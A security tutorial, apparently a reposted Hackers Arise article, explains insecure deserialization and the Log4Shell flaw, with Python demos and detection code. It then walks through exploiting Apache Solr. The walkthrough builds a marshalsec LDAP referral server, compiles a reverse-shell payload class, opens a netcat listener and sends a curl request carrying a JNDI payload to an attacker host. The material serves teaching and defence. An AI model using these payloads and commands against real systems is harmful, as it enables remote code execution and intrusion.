National Cyber Warfare Foundation (NCWF)

The post Insecure De-serialization: Millions of Applications May Be Vulnerable first appeared on Hackers Arise.

Welcome back, rising cyberwarriors!

Insecure deserialization is one of the most critical security vulnerabilities in modern software applications. OWASP listed it separately as A8 in its 2017 Top 10, and the 2021 edition folds it into A08: Software and Data Integrity Failures. This vulnerability occurs when applications deserialize untrusted data without proper validation, potentially allowing attackers to execute arbitrary code, manipulate application logic, or gain unauthorized system access.

The Apache Log4j vulnerability (CVE-2021-44228), publicly disclosed in December 2021, exemplifies the devastating impact of insecure deserialization. Known as “Log4Shell,” this zero-day vulnerability affected millions of applications worldwide, demonstrating how a seemingly innocuous logging library could become a gateway for remote code execution attacks.

In this article, I want to explore the fundamental concepts of serialization and deserialization, examine the mechanisms behind insecure deserialization attacks, and analyze how these principles manifested in the Log4j vulnerability.

Historical Context and Timeline

The concept of serialization has been integral to computing since the early days of distributed systems. However, the security implications of deserialization have evolved significantly over time:

Early Era (1990s-2000s):

Serialization primarily used for data storage and inter-process communication

Security considerations were minimal, focusing mainly on data integrity

Limited awareness of deserialization as an attack vector

Recognition Phase (2000s-2010s):

First documented deserialization attacks emerged

Security researchers began identifying patterns in vulnerable implementations

Languages like Java, Python, and .NET showed susceptibility to deserialization exploits

Modern Era (2010s-Present):

Widespread adoption of serialization in web applications and microservices

OWASP recognition of insecure deserialization as a top security risk

High-profile vulnerabilities in popular frameworks and libraries

Log4j Timeline:

2013: JNDI lookup functionality added in Log4j 2.0-beta9 (the final 2.0 release followed in 2014)

November 24, 2021: Vulnerability reported privately to the Apache Software Foundation by Alibaba Cloud’s security team

December 9, 2021: CVE-2021-44228 publicly disclosed

December 10, 2021: Proof-of-concept exploits widely available

December 2021: Multiple patches released (2.15.0, 2.16.0, 2.17.0)

Ongoing: Continued discovery of related vulnerabilities and bypass techniques

Understanding Serialization and Deserialization

Serialization is the process of converting an object’s state into a format that can be stored, transmitted, or reconstructed later. This process enables applications to:

Persist object states to disk or databases

Transmit complex data structures over networks

Cache application states for performance optimization

Enable inter-process communication in distributed systems

During serialization, an object’s instance variables, class information, and metadata are encoded into a byte stream or text format. The serialized data describes how to rebuild the original object: class names and type descriptors, field values, and references between objects. It does not normally contain the class’s code, so the receiving side must already have (or be able to load) the class.
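To make this concrete, here is a minimal sketch using Python’s pickle module (covered later in this article); the Point class is a hypothetical example. It shows that the byte stream records the class by name together with the field values, and that loading it builds a new, equivalent object.

```python
import pickle
from dataclasses import dataclass


@dataclass
class Point:  # hypothetical example class
    x: int
    y: int


original = Point(3, 4)
data = pickle.dumps(original)  # object state -> bytes

# The stream names the class (module and class name) and stores the field
# values, but not Point's code: the loading side must already have the class.
print(b"Point" in data)  # True

restored = pickle.loads(data)  # bytes -> a new, equal object
print(restored)  # Point(x=3, y=4)
print(restored == original, restored is original)  # True False
```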

Deserialization reverses the serialization process, reconstructing objects from their serialized representations. This involves:

Data Parsing: Reading and interpreting the serialized format

Class Loading: Instantiating the appropriate object classes

State Reconstruction: Populating object fields with deserialized values

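Method Execution: Potentially running code during reconstruction, such as Java’s readObject() or PHP’s __wakeup()/__unserialize() hooks, or any callable recorded in a Python pickle stream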

The security risk emerges during this process when applications deserialize untrusted data without proper validation, allowing attackers to manipulate the deserialization process.
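The “Method Execution” step is where things go wrong. In this minimal Python sketch, an object uses __reduce__ to tell pickle which callable (and arguments) to invoke when the data is loaded. The side_effect function is a hypothetical, harmless stand-in for something dangerous such as os.system; the point is that pickle.loads() calls whatever the byte stream names.

```python
import pickle

CALLS = []  # records side effects so we can see what ran


def side_effect(message):
    """Hypothetical stand-in for a dangerous call such as os.system."""
    CALLS.append(message)
    return message


class Innocent:
    def __reduce__(self):
        # pickle stores this (callable, args) pair in the byte stream;
        # pickle.loads() will look up side_effect and call it.
        return (side_effect, ("executed during pickle.loads()",))


payload = pickle.dumps(Innocent())  # what an attacker would send
result = pickle.loads(payload)      # the victim "just" deserializes

print(CALLS)                  # ['executed during pickle.loads()']
print(type(result).__name__)  # str, not Innocent
```

Nothing in the loading code mentions side_effect; the data alone decided what ran.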

Common Serialization Formats

Modern applications utilize various serialization formats, each with distinct characteristics and security implications:

Format	Type	Security Level	Performance	Human Readable	Schema Support
Java Native	Binary	Low	High	No	Implicit
Protocol Buffers	Binary	High	Very High	No	Explicit
JSON	Text	Medium	Medium	Yes	Optional
XML	Text	Medium	Low	Yes	DTD/XSD
YAML	Text	Low	Medium	Yes	Optional
Apache Avro	Binary	High	High	No	Explicit

Java Native Serialization:

Uses Java’s built-in serialization mechanism

Produces binary output with class metadata

Highly vulnerable to deserialization attacks

Common in enterprise Java applications

Protocol Buffers (protobuf):

Google’s language-neutral serialization format

Efficient binary encoding with schema definitions

Generally safer due to strict schema validation

Requires explicit field definitions

Apache Avro:

Schema-based serialization system

Supports schema evolution and compatibility

Binary format with JSON schema definitions

Used extensively in big data ecosystems

JSON (JavaScript Object Notation):

Human-readable text format

Language-independent data interchange

Limited object type support

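Generally safer, but still vulnerable when a library lets the data choose which class to instantiate (for example, Jackson’s polymorphic type handling or Json.NET’s TypeNameHandling)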
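To illustrate how JSON can become dangerous, here is a minimal Python sketch of a hypothetical "@type" convention in which the payload names the class to build. It is loosely modeled on the polymorphic type-handling features found in some JSON libraries, not on any library’s actual format. The naive decoder instantiates whatever class the data asks for; the safer one only accepts names from an explicit allowlist.

```python
import importlib
import json
from dataclasses import dataclass
from datetime import timedelta


def naive_decode(text):
    """UNSAFE: the payload's "@type" key picks ANY importable class."""
    def hook(obj):
        if "@type" in obj:
            module_name, _, class_name = obj.pop("@type").rpartition(".")
            cls = getattr(importlib.import_module(module_name), class_name)
            return cls(**obj)  # attacker chooses the class and its arguments
        return obj
    return json.loads(text, object_hook=hook)


def safe_decode(text, allowed):
    """Safer: only class names in an explicit allowlist can be instantiated."""
    def hook(obj):
        if "@type" in obj:
            type_name = obj.pop("@type")
            if type_name not in allowed:
                raise ValueError(f"type {type_name!r} is not allowed")
            return allowed[type_name](**obj)
        return obj
    return json.loads(text, object_hook=hook)


@dataclass
class Point:  # hypothetical application class
    x: int
    y: int


payload = '{"@type": "datetime.timedelta", "days": 2}'
print(naive_decode(payload) == timedelta(days=2))  # True: the payload chose the class

print(safe_decode('{"@type": "Point", "x": 1, "y": 2}', {"Point": Point}))  # Point(x=1, y=2)
try:
    safe_decode(payload, {"Point": Point})
except ValueError as exc:
    print(exc)  # type 'datetime.timedelta' is not allowed
```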

XML (eXtensible Markup Language):

Structured markup language

Supports complex hierarchical data

Vulnerable to XML External Entity (XXE) attacks

Requires careful parsing to prevent security issues

YAML (YAML Ain’t Markup Language):

Human-readable data serialization standard

Supports complex data structures

Some loaders can instantiate arbitrary objects and execute code during deserialization (for example, PyYAML’s yaml.load() with an unsafe Loader)

Requires careful configuration for security

While different programming languages use varying keywords and functions for serialization, the underlying principle remains consistent. Whether Java, Python, .NET, or PHP, each language implements serialization to accommodate the specific features and security measures of its environment.

Serialization in PHP involves converting data structures or objects into a string format for storage or transfer, and then reconstructing them later. PHP uses the built-in serialize() function to create this string representation and unserialize() to restore it. These functions work on arrays, objects, and scalar types but exclude resources and some internal objects. Serialized data includes metadata about types and values, preserving the state of objects including class information. PHP allows classes to customize serialization via magic methods such as __serialize() and __unserialize(). These were introduced in PHP 7.4 and take precedence over the older __sleep() and __wakeup() methods when both are defined.

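Python handles serialization primarily with the pickle module, which can serialize nearly any Python object, including instances of custom classes, into a binary format; pickle.dump()/pickle.dumps() write the data and pickle.load()/pickle.loads() reverse the process. Python’s documentation explicitly warns that pickle is not secure and that you should only unpickle data you trust. For simpler or language-independent serialization, Python also offers the json module, which converts between JSON strings and Python dictionaries or lists.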

Language	Built-in Serialization	Common Customization	JSON Support
PHP	`serialize()` / `unserialize()`	Magic methods (`__serialize`, `__unserialize`, `__sleep`, `__wakeup`)	`json_encode()` / `json_decode()`
Python	`pickle.dump()` / `pickle.load()`	Special methods (`__getstate__`, `__setstate__`, `__reduce__`)	`json.dumps()` / `json.loads()`
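By contrast with pickle, the json module only understands basic types (dicts, lists, strings, numbers, booleans, None), so the application itself has to decide which class to rebuild. A minimal sketch, where the User class is hypothetical:

```python
import json
from dataclasses import asdict, dataclass


@dataclass
class User:  # hypothetical application class
    name: str
    admin: bool


user = User("alice", False)

try:
    json.dumps(user)  # json does not know how to encode a custom class
except TypeError as exc:
    print("json refuses:", exc)

text = json.dumps(asdict(user))  # explicit conversion to a plain dict
print(text)  # {"name": "alice", "admin": false}

data = json.loads(text)  # comes back as a plain dict, not a User
restored = User(**data)  # the application, not the data, picks the class
print(restored == user)  # True
```

This is why JSON is generally safer: the payload carries values, while the choice of class stays in the application’s code.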

The Log4j Case

At this point, we’ve covered the basics of serialization and are ready to move on to the Log4j vulnerability.

Log4j is a Java-based logging framework broadly used in enterprise and cloud applications. Its core function is to append events, messages, and context into logs. With the introduction of JNDI (Java Naming and Directory Interface) lookup functionality in Log4j 2, log messages could reference external resources using special patterns, such as ${jndi:ldap://server/path}.
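The core problem can be modeled in a few lines. The following Python sketch is a toy, not Log4j’s code: resolve_lookups, the resolver table, and both logging functions are hypothetical. It shows that if lookups are evaluated after user data has been placed into the message, whoever controls a logged field controls which lookups run.

```python
import re

# Matches ${prefix:value}, e.g. ${env:USER} or ${jndi:ldap://host/a}.
LOOKUP = re.compile(r"\$\{(\w+):([^}]*)\}")

# Hypothetical resolvers standing in for Log4j lookups; the jndi one only
# describes what a real lookup would do instead of contacting anything.
RESOLVERS = {
    "env": lambda key: {"USER": "solr"}.get(key, ""),
    "jndi": lambda uri: f"<would contact {uri}>",
}


def resolve_lookups(text):
    """Replace every ${prefix:value} with the matching resolver's result."""
    def replace(match):
        resolver = RESOLVERS.get(match.group(1))
        return resolver(match.group(2)) if resolver else match.group(0)
    return LOOKUP.sub(replace, text)


def log_vulnerable(template, *args):
    # Flaw: user data is inserted first, then lookups run on the whole message.
    return resolve_lookups(template.format(*args))


def log_safer(template, *args):
    # Lookups run only on the developer-written template; user data stays literal.
    return resolve_lookups(template).format(*args)


user_agent = "${jndi:ldap://evil.example/a}"  # attacker-controlled header
print(log_vulnerable("UA={}", user_agent))  # UA=<would contact ldap://evil.example/a>
print(log_safer("UA={}", user_agent))       # UA=${jndi:ldap://evil.example/a}
```

Treating logged user data as inert text, as log_safer does, is roughly the direction later Log4j releases took when they stopped evaluating lookups inside message text.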

When Log4j encountered such a lookup in a log message (for example, if an attacker sent it in an HTTP User-Agent header or another field that the application logs), the framework would perform a JNDI lookup. If the referenced server was under attacker control, its response could carry either a serialized Java object or a reference to a remote Java class. When the JVM deserialized that object, or loaded and instantiated the referenced class, attacker-supplied code could run, resulting in remote code execution.

In classic insecure deserialization, an attacker manipulates serialized data to inject malicious objects or payloads. In Log4j, the exploit chain worked as follows:

Attacker injects ${jndi:ldap://evil.com/a} into any input logged by Log4j.

Log4j parses the log event and initiates a JNDI lookup.

The attacker’s LDAP server responds with a reference to a remote Java class (or with a serialized Java object).

The application fetches and loads this code, executing it, thus granting the attacker arbitrary code execution.
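On the defensive side, a first step is spotting these strings in logs or requests. The Python sketch below flags ${jndi: after undoing URL encoding and a few well-known obfuscation tricks: ${lower:x}, ${upper:x}, and default-value forms such as ${::-j}. It is an illustrative heuristic under those assumptions, not a complete detection rule; attackers have used many other variants.

```python
import re
from urllib.parse import unquote

# A few known obfuscation forms (assumed, not exhaustive).
DEFAULT_VALUE = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")  # ${anything:-x} -> x
LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def normalize(text, max_rounds=10):
    """Undo URL encoding, then repeatedly collapse innermost simple lookups."""
    text = unquote(text)
    for _ in range(max_rounds):
        new = LOWER.sub(lambda m: m.group(1).lower(), text)
        new = UPPER.sub(lambda m: m.group(1).upper(), new)
        new = DEFAULT_VALUE.sub(lambda m: m.group(1), new)
        if new == text:  # nothing left to collapse
            break
        text = new
    return text


def looks_like_log4shell(text):
    return bool(JNDI.search(normalize(text)))


print(looks_like_log4shell("${${::-j}${::-n}di:ldap://evil.example/a}"))  # True
print(looks_like_log4shell("Mozilla/5.0 (X11; Linux x86_64)"))  # False
```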

Reconnaissance

The sheer danger of this vulnerability stems from how ubiquitous the logging package is. Millions of applications, as well as software providers, use Log4j as a dependency in their own code.
For this example, I’ll demonstrate the vulnerability on Apache Solr 8.11.0, which is one example of software known to include this vulnerable Log4j package.

Begin with basic reconnaissance to identify which ports are open on the target and what is running on port 8983, Solr’s default port.
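A port scanner such as nmap is the usual tool here. As a minimal illustration of what a TCP connect check does, the Python sketch below simply tries to open a connection to the target port; port_is_open is a hypothetical helper and the address is a placeholder.

```python
import socket


def port_is_open(host, port, timeout=2.0):
    """Return True if a TCP connection to host:port succeeds within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, unreachable, timed out, ...
        return False


if __name__ == "__main__":
    target = "127.0.0.1"  # placeholder: replace with the target's address
    print(f"{target}:8983 open?", port_is_open(target, 8983))
```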

Exploitation

We’re going to use a free, publicly available tool to set up something called an “LDAP Referral Server.” This server’s job is to take the victim’s first request and send it somewhere else.

Here’s how it works step-by-step:

When the vulnerable application logs a string such as ${jndi:ldap://attackerserver:1389/Resource}, it contacts our LDAP Referral Server.

The LDAP Referral Server responds with a reference pointing to another location, such as http://attackerserver/resource.

The victim’s system goes to that second location and downloads code from there.

That code runs on the victim’s machine.

In this technique, the LDAP response doesn’t carry the malicious code itself; it is more like a pointer telling the victim’s system where to go next. The LDAP Referral Server acts as a middleman that sends the victim to an HTTP server where the real payload (a compiled Java class) is hosted. This keeps the LDAP side simple and lets us serve whatever compiled class we like over plain HTTP.

To do all this, we need an HTTP server running (on port 8000 or similar) to host and serve that code.

Step 1: Install Java

The first step is to obtain the LDAP Referral Server. We will use the marshalsec utility, available at https://github.com/mbechler/marshalsec. It requires Java; version 8 is recommended.

We can download it from the Oracle archive: https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html

Run the following commands to configure your system to use this Java version by default:

kali> sudo mkdir -p /usr/lib/jvm

kali> cd /usr/lib/jvm

kali> sudo tar xzvf ~/Downloads/jdk-8u181-linux-x64.tar.gz

kali> sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_181/bin/java" 1

kali> sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_181/bin/javac" 1

kali> sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_181/bin/javaws" 1

kali> sudo update-alternatives --set java /usr/lib/jvm/jdk1.8.0_181/bin/java

kali> sudo update-alternatives --set javac /usr/lib/jvm/jdk1.8.0_181/bin/javac

kali> sudo update-alternatives --set javaws /usr/lib/jvm/jdk1.8.0_181/bin/javaws

Then, check the version:

kali> java -version

Step 2: Download marshalsec

The simplest approach is to download the repository from GitHub:

kali> git clone https://github.com/mbechler/marshalsec

kali> cd marshalsec

Next, we need to build marshalsec with Maven, the Java build tool:

kali> sudo apt install maven

kali> mvn clean package -DskipTests

With the marshalsec utility built, we can start an LDAP referral server to direct connections to our secondary HTTP server (which we will prepare later). The syntax to start the LDAP server is as follows:

kali> java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://IP:Port/#Exploit"
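The argument passed to LDAPRefServer packs two things into one URL. As far as we can tell from marshalsec’s source, the part before # becomes the codebase and the fragment after # is the name of the class the victim’s JVM is told to load; the server also listens on port 1389 by default, which matches the :1389 used when triggering the exploit. The Python sketch below (referral_target is a hypothetical helper, and the address is a placeholder) shows where the victim would then fetch the class, assuming the JVM resolves the codebase like a standard URLClassLoader.

```python
from urllib.parse import urlsplit, urlunsplit


def referral_target(arg):
    """Split a 'codebase#ClassName' argument (assumed marshalsec-style format)."""
    parts = urlsplit(arg)
    class_name = parts.fragment  # e.g. "Exploit"
    # Codebase = the same URL without the fragment.
    codebase = urlunsplit((parts.scheme, parts.netloc, parts.path, parts.query, ""))
    # URLClassLoader treats a URL ending in "/" as a directory, anything else as a JAR.
    if not codebase.endswith("/"):
        raise ValueError("codebase must end with '/' to be treated as a directory")
    # A directory codebase serves classes as <codebase><package path>/<Name>.class
    class_url = codebase + class_name.replace(".", "/") + ".class"
    return codebase, class_name, class_url


print(referral_target("http://10.0.0.5:8000/#Exploit"))
# ('http://10.0.0.5:8000/', 'Exploit', 'http://10.0.0.5:8000/Exploit.class')
```

In other words, the IP and Port in the LDAP server’s argument must point at the HTTP server that hosts Exploit.class, and the trailing slash before # matters.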

Now that our LDAP server is ready and waiting, we can open a second terminal window to prepare our final payload and set up a secondary HTTP server.

Ultimately, the Log4j vulnerability will execute arbitrary code that you write in Java. In this example, we will use it to obtain a reverse shell and gain control over the target machine.

Create a new file named Exploit.java:

Next, we need to compile this payload with:

kali> javac Exploit.java -source 8 -target 8

You may see a warning at this step; it appears on my system because I have multiple versions of Java installed. Regardless, the Exploit.class file was created successfully.

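With the payload compiled, we can start a temporary HTTP server from the directory containing Exploit.class. Python’s http.server listens on port 8000 by default, so use that port (or whichever one you choose) in the LDAP server’s URL.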

kali> python3 -m http.server

Next, prepare a netcat listener on the port your payload connects back to:

kali> nc -lnvp port

Finally, all that is left to do is trigger the exploit and fire off our JNDI syntax:

kali> curl 'http://IP:8983/solr/admin/cores?foo=$\{jndi:ldap://IP:1389/Exploit\}'

And we’ve achieved RCE!

Summary

Insecure deserialization is a serious and common problem in modern software. The Log4j “Log4Shell” vulnerability shows how failing to validate untrusted data before deserializing or resolving it can lead to remote code execution affecting many systems worldwide. This case teaches us an important lesson: any part of software that reads, creates, or runs code from outside inputs must always be carefully checked and protected.
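In Python, one concrete way to apply that lesson is the allowlisting approach described in the pickle documentation: override Unpickler.find_class() so that only explicitly approved globals can be loaded. The sketch below follows that idea; the allowlist is an assumption you would tailor to your application, and Java’s closest counterpart is ObjectInputFilter (JEP 290). Even so, for untrusted input a data-only format such as JSON remains the safer choice.

```python
import builtins
import io
import pickle

# Globals that may be loaded; everything else is rejected (assumed allowlist).
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the stream references a class or function by name.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data):
    """Like pickle.loads(), but only resolves allowlisted globals."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Malicious:
    def __reduce__(self):
        return (eval, ("1 + 1",))  # would call eval() on load


print(restricted_loads(pickle.dumps([1, 2, range(3)])))  # [1, 2, range(0, 3)]
try:
    restricted_loads(pickle.dumps(Malicious()))
except pickle.UnpicklingError as exc:
    print(exc)  # global 'builtins.eval' is forbidden
```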

For those interested in improving their cybersecurity skills, especially in understanding and defending against complex vulnerabilities like insecure deserialization, Hackers-Arise offers expert-led training programs. Check it out!